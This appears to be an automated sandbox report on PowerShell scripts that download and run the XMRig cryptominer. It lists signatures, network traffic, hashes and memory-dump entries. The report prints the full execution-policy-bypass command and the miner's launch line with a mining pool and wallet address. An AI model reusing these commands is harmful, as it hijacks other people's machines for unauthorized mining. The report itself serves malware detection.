memory/3632-103-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-104-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-105-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-106-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-107-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-108-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-109-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-110-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-111-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-112-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-113-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-114-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-115-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-116-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

memory/3632-117-0x00007FF7AAB60000-0x00007FF7AB793000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:08

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2664-0-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_obpg3x3r.fff.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2664-9-0x000001D7FF7A0000-0x000001D7FF7C2000-memory.dmp

memory/2664-10-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2664-11-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2664-12-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2664-14-0x000001D7FF7D0000-0x000001D7FF7E2000-memory.dmp

memory/2664-15-0x000001D7FE120000-0x000001D7FE12A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1452-46-0x00000239932C0000-0x00000239932E0000-memory.dmp

memory/1452-47-0x0000023A25880000-0x0000023A258A0000-memory.dmp

memory/1452-48-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-51-0x0000023A25CC0000-0x0000023A25CE0000-memory.dmp

memory/1452-50-0x0000023A25EF0000-0x0000023A25F10000-memory.dmp

memory/2664-49-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/2664-53-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

memory/1452-52-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-54-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-55-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-56-0x0000023A25EF0000-0x0000023A25F10000-memory.dmp

memory/1452-57-0x0000023A25CC0000-0x0000023A25CE0000-memory.dmp

memory/1452-58-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-59-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-60-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-61-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-62-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-63-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-64-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-65-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-66-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-67-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-68-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-69-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-70-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-71-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-72-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-73-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-74-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-75-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-76-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-77-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-78-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-79-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-80-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-81-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-82-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-83-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-84-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-85-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-86-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-87-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-88-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-89-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-90-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-91-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-92-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-93-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-94-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-95-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-96-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-97-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-98-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-99-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-100-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-101-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-102-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-103-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-104-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-105-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-106-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-107-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-108-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-109-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-110-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-111-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-112-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-113-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-114-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-115-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

memory/1452-116-0x00007FF65E660000-0x00007FF65F293000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:11

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1764s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

memory/3708-0-0x00007FF841563000-0x00007FF841565000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hteirlwz.f4r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3708-10-0x0000024250F40000-0x0000024250F62000-memory.dmp

memory/3708-11-0x00007FF841560000-0x00007FF842021000-memory.dmp

memory/3708-12-0x00007FF841560000-0x00007FF842021000-memory.dmp

memory/3708-14-0x00007FF841560000-0x00007FF842021000-memory.dmp

memory/3708-15-0x0000024251350000-0x0000024251362000-memory.dmp

memory/3708-16-0x0000024250F70000-0x0000024250F7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4496-47-0x0000016325220000-0x0000016325240000-memory.dmp

memory/4496-48-0x0000016326B20000-0x0000016326B40000-memory.dmp

memory/4496-49-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-52-0x0000016326B60000-0x0000016326B80000-memory.dmp

memory/4496-50-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-51-0x0000016326B40000-0x0000016326B60000-memory.dmp

memory/3708-53-0x00007FF841563000-0x00007FF841565000-memory.dmp

memory/3708-54-0x00007FF841560000-0x00007FF842021000-memory.dmp

memory/4496-55-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-56-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-58-0x0000016326B60000-0x0000016326B80000-memory.dmp

memory/4496-57-0x0000016326B40000-0x0000016326B60000-memory.dmp

memory/4496-59-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-60-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-61-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-62-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-63-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-64-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-65-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-66-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-67-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-68-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-69-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-70-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-71-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-72-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-73-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-74-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-75-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-76-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-77-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-78-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-79-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-80-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-81-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-82-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-83-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-84-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-85-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-86-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-87-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-88-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-89-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-90-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-91-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-92-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-93-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-94-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-95-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-96-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-97-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-98-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-99-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-100-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-101-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-102-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-103-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-104-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-105-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-106-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-107-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-108-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-109-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-110-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-111-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-112-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-113-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-114-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-115-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-116-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

memory/4496-117-0x00007FF6CC770000-0x00007FF6CD3A3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:38

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
